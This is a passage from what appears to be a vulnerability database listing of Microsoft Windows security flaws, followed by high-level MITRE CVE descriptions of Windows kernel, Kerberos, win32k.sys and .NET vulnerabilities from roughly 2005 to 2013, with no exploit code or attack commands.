PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 2003 Buffer Overflow Protection unknown vulnerability [278] Microsoft Windows XP ZIP Manager memory corruption [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [270] Microsoft Windows XP SP1 TCP Packet unknown vulnerability [269] Microsoft Windows up to 98 SP1 UDP Fragment denial of service [261] Microsoft Windows NT 4.0 NetBIOS information disclosure [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [193] Microsoft Windows up to 8.x Media Player unknown vulnerability [179] Microsoft Windows XP desktop.ini memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [165] Microsoft Windows NT 4.0/2000/XP SMB memory corruption [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [124] Microsoft Windows 5 Media Service ISAPI Extension /scripts memory corruption [123] Microsoft Windows 9 Media Player privilege escalation [71] Microsoft Windows Media Player unknown vulnerability [69] Microsoft Windows XP Internet Connection Firewall unknown vulnerability [61] Microsoft Windows XP Media Player 7.1 privilege escalation [41] Microsoft Windows Form Input Type denial of service [9] Microsoft Windows riched20.dll memory corruption [8] Microsoft Windows NT 4.0/2000 cmd.exe cd memory corruption [4] Microsoft Windows 2000 NetBIOS denial of service MITRE CVE - https://cve.mitre.org: [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3127] The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows Media Format Runtime 9 and 9.5, and wmvdecod.dll in Windows Media Format Runtime 11 and Windows Media Player 11 and 12 allows remote attackers to execute arbitrary code via a crafted media file, aka "WMV Video Decoder Remote Code Execution Vulnerability." [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1337] Microsoft .NET Framework 4.5 does not properly create policy requirements for custom Windows Communication Foundation (WCF) endpoint authentication in certain situations involving passwords over HTTPS, which allows remote attackers to bypass authentication by sending queries to an endpoint, aka "Authentication Bypass Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1333] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1313] Object Linking and Embedding (OLE) Automation in Microsoft Windows XP SP3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted RTF document, aka "OLE Automation Remote Code Execution Vulnerability." [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1299] Microsoft Windows Modern Mail allows remote attackers to spoof link targets via a crafted HTML e-mail message. [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0078] The Microsoft Antimalware Client in Windows Defender on Windows 8 and Windows RT uses an incorrect pathname for MsMpEng.exe, which allows local users to gain privileges via a crafted application, aka "Microsoft Antimalware Improper Pathname Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy 